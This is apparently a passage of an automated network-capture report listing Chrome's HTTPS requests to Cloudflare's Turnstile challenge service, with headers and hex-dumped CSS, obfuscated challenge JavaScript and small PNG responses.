                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 75 6f 34 73 36 66 64 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69
                                                                                                                  Data Ascii: -dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.uo4s6fd{0%{fill:#de1303;stroke:#de1303}to{fi
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b
                                                                                                                  Data Ascii: x-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73
                                                                                                                  Data Ascii: x}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;jus
                                                                                                                  2024-10-22 14:08:19 UTC1369INData Raw: 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65
                                                                                                                  Data Ascii: 9;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1649722104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:20 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a0f0a98ece91e&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:20 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:20 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 117039
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f10db2f3aae-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:20 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 6d 65 64 25 32 30 6f 75 74 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63 63 65 73 73 22 3a 22 53 75 63 63 65 73 73 25 32 31 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e
                                                                                                                  Data Ascii: med%20out","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_success":"Success%21","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_lin
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 38 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 37 31 39 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 32 35 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 35 35 38 29 29 2f 39 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 32 38 36 33 35 36 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 34 34 39 29 5d 2c 65 4d 5b 67 4c 28 31 37 38 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4c 28 31 36 32 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 37 29 7b 69 66 28 68 37 3d 67 4c 2c 65 4d 5b 68 37 28 31 37 38 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 37 28 31 37 38 33
                                                                                                                  Data Ascii: 8))/6+-parseInt(gK(1719))/7+-parseInt(gK(1425))/8+parseInt(gK(558))/9,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,286356),eM=this||self,eN=eM[gL(449)],eM[gL(1783)]=![],eM[gL(1627)]=function(h7){if(h7=gL,eM[h7(1783)])return;eM[h7(1783
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 69 74 28 27 41 27 29 2c 42 3d 42 5b 69 33 28 31 33 32 38 29 5d 5b 69 33 28 34 35 31 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 69 33 28 31 34 35 31 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 66 78 28 67 2c 68 2c 44 29 2c 6f 5b 69 33 28 31 31 33 35 29 5d 28 42 2c 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 69 33 28 31 38 32 33 29 5d 28 68 5b 44 5d 29 2c 6f 5b 69 33 28 31 30 38 30 29 5d 28 6f 5b 69 33 28 39 39 36 29 5d 2c 69 2b 44 29 3f 6f 5b 69 33 28 31 35 33 35 29 5d 28 73 2c 69 2b 44 2c 45 29 3a 46 7c 7c 73 28 6f 5b 69 33 28 36 33 31 29 5d 28 69 2c 44 29 2c 68 5b 44 5d 29 29 3a 6f 5b 69 33 28 31 35 33 35 29 5d 28 73 2c 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 69 34 29 7b 69 34 3d 69 33
                                                                                                                  Data Ascii: it('A'),B=B[i3(1328)][i3(451)](B),C=0;C<x[i3(1451)];D=x[C],E=fx(g,h,D),o[i3(1135)](B,E)?(F=E==='s'&&!g[i3(1823)](h[D]),o[i3(1080)](o[i3(996)],i+D)?o[i3(1535)](s,i+D,E):F||s(o[i3(631)](i,D),h[D])):o[i3(1535)](s,i+D,E),C++);return j;function s(G,H,i4){i4=i3
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 27 72 66 63 6e 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 77 62 69 75 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 4b 63 43 73 57 27 3a 69 37 28 31 37 34 39 29 2c 27 70 61 54 52 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 65 6c 45 76 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 56 42 52 73 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 44 63 4c 76 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 61 66 46 42 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20
                                                                                                                  Data Ascii: 'rfcnn':function(h,i){return h==i},'wbiuK':function(h,i){return h!==i},'KcCsW':i7(1749),'paTRt':function(h,i){return h==i},'elEvD':function(h,i){return h>i},'VBRst':function(h,i){return i&h},'DcLvd':function(h,i){return i==h},'afFBa':function(h,i){return
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 69 61 28 31 31 36 31 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 69 61 28 31 31 35 36 29 5d 5b 69 61 28 31 38 37 37 29 5d 5b 69 61 28 31 31 36 31 29 5d 28 45 2c 46 29 29 7b 69 66 28 64 5b 69 61 28 38 39 32 29 5d 21 3d 3d 69 61 28 31 37 37 32 29 29 49 5b 69 61 28 31 36 30 36 29 5d 5b 69 61 28 31 37 38 36 29 5d 3d 4a 3b 65 6c 73 65 7b 69 66 28 32 35 36 3e 46 5b 69 61 28 35 37 38 29 5d 28 30 29 29 7b 69 66 28 69 61 28 31 33 36 38 29 21 3d 3d 64 5b 69 61 28 31 35 35 39 29 5d 29 7b 66 6f 72 28 43 3d 30 3b 64 5b 69 61 28 31 34 38 36 29 5d 28 43 2c 49 29 3b 4b 3c 3c 3d 31 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 69 61 28 31 33 38 33 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46
                                                                                                                  Data Ascii: ia(1161)](D,O))F=O;else{if(Object[ia(1156)][ia(1877)][ia(1161)](E,F)){if(d[ia(892)]!==ia(1772))I[ia(1606)][ia(1786)]=J;else{if(256>F[ia(578)](0)){if(ia(1368)!==d[ia(1559)]){for(C=0;d[ia(1486)](C,I);K<<=1,o-1==L?(L=0,J[ia(1383)](s(K)),K=0):L++,C++);for(P=F
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 30 29 2c 43 3d 30 3b 64 5b 69 61 28 36 35 30 29 5d 28 38 2c 43 29 3b 4b 3d 64 5b 69 61 28 31 31 38 34 29 5d 28 64 5b 69 61 28 31 38 31 36 29 5d 28 4b 2c 31 29 2c 64 5b 69 61 28 31 30 30 35 29 5d 28 50 2c 31 29 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 69 61 28 31 33 38 33 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 61 28 31 31 38 34 29 5d 28 64 5b 69 61 28 31 38 31 36 29 5d 28 4b 2c 31 29 2c 50 29 2c 64 5b 69 61 28 38 33 33 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 69 61 28 31 33 38 33 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 61 28 35 37 38 29 5d 28
                                                                                                                  Data Ascii: 0),C=0;d[ia(650)](8,C);K=d[ia(1184)](d[ia(1816)](K,1),d[ia(1005)](P,1)),o-1==L?(L=0,J[ia(1383)](s(K)),K=0):L++,P>>=1,C++);}}else{for(P=1,C=0;C<I;K=d[ia(1184)](d[ia(1816)](K,1),P),d[ia(833)](L,o-1)?(L=0,J[ia(1383)](s(K)),K=0):L++,P=0,C++);for(P=F[ia(578)](
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 67 28 37 30 35 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 67 28 35 36 39 29 5d 28 64 5b 69 67 28 31 34 38 36 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 67 28 35 31 32 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 67 28 31 36 37 33 29 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 67 28 35 31 32 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c
                                                                                                                  Data Ascii: &&(H=j,G=d[ig(705)](o,I++)),J|=d[ig(569)](d[ig(1486)](0,L)?1:0,F),F<<=1);switch(J){case 0:for(J=0,K=Math[ig(512)](2,8),F=1;d[ig(1673)](F,K);L=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J|=F*(0<L?1:0),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[ig(512)](2,16),F=1;F!=K;L
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 2b 27 5f 27 2c 30 29 2c 6c 3d 6c 5b 69 68 28 31 37 33 33 29 5d 28 2f 2e 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 2c 69 69 29 7b 69 66 28 69 69 3d 69 68 2c 68 5b 69 69 28 31 34 33 30 29 5d 21 3d 3d 68 5b 69 69 28 31 30 30 36 29 5d 29 6a 5e 3d 6c 5b 69 69 28 35 37 38 29 5d 28 73 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 69 69 28 31 30 32 36 29 5b 69 69 28 35 32 34 29 5d 28 6d 29 7d 29 2c 66 3d 65 4d 5b 69 68 28 31 31 30 34 29 5d 28 66 29 2c 6b 3d 5b 5d 2c 69 3d 2d 31 3b 21 69 73 4e 61 4e 28 6d 3d 66 5b 69 68 28 35 37 38 29 5d 28 2b 2b 69 29 29 3b 6b 5b 69 68 28 31 33 38 33 29 5d 28 53 74 72 69 6e 67 5b 69 68 28 31 36 38 30 29 5d 28 28 68 5b 69 68 28 31 34 34 39 29 5d 28 28 32 35 35 26 6d 29 2d 6a 2c 68 5b 69 68 28 35 37 36 29 5d 28 69 2c 36 35 35 33 35
                                                                                                                  Data Ascii: +'_',0),l=l[ih(1733)](/./g,function(n,s,ii){if(ii=ih,h[ii(1430)]!==h[ii(1006)])j^=l[ii(578)](s);else return ii(1026)[ii(524)](m)}),f=eM[ih(1104)](f),k=[],i=-1;!isNaN(m=f[ih(578)](++i));k[ih(1383)](String[ih(1680)]((h[ih(1449)]((255&m)-j,h[ih(576)](i,65535
                                                                                                                  2024-10-22 14:08:20 UTC1369INData Raw: 5b 69 6c 28 31 32 31 30 29 5d 29 2c 6d 3d 6b 5b 69 6c 28 36 37 34 29 5d 28 69 2c 6b 5b 69 6c 28 35 36 36 29 5d 29 2c 6e 3d 65 4d 5b 69 6c 28 31 36 30 36 29 5d 5b 69 6c 28 31 31 37 32 29 5d 3f 6b 5b 69 6c 28 31 34 37 30 29 5d 28 27 68 2f 27 2c 65 4d 5b 69 6c 28 31 36 30 36 29 5d 5b 69 6c 28 31 31 37 32 29 5d 29 2b 27 2f 27 3a 27 27 2c 6f 3d 6b 5b 69 6c 28 31 39 30 30 29 5d 28 6b 5b 69 6c 28 31 31 37 35 29 5d 28 6b 5b 69 6c 28 31 36 38 35 29 5d 28 6b 5b 69 6c 28 31 39 30 30 29 5d 28 69 6c 28 31 34 36 38 29 2b 6e 2c 69 6c 28 31 33 39 30 29 29 2b 31 2b 69 6c 28 31 36 39 37 29 2b 65 4d 5b 69 6c 28 31 36 30 36 29 5d 5b 69 6c 28 31 32 32 32 29 5d 2b 27 2f 27 2c 65 4d 5b 69 6c 28 31 36 30 36 29 5d 2e 63 48 29 2c 27 2f 27 29 2c 65 4d 5b 69 6c 28 31 36 30 36 29 5d
                                                                                                                  Data Ascii: [il(1210)]),m=k[il(674)](i,k[il(566)]),n=eM[il(1606)][il(1172)]?k[il(1470)]('h/',eM[il(1606)][il(1172)])+'/':'',o=k[il(1900)](k[il(1175)](k[il(1685)](k[il(1900)](il(1468)+n,il(1390))+1+il(1697)+eM[il(1606)][il(1222)]+'/',eM[il(1606)].cH),'/'),eM[il(1606)]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.1649723104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:20 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:20 UTC240INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:20 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f10da9a6b8e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.1649725104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:21 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:21 UTC240INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:21 GMT
                                                                                                                  Content-Type: image/png
                                                                                                                  Content-Length: 61
                                                                                                                  Connection: close
                                                                                                                  cache-control: max-age=2629800, public
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f15abaa6c2e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:21 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.1649727104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:22 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a0f0a98ece91e&lang=auto HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:22 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:22 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 120904
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f1ac8010bfb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
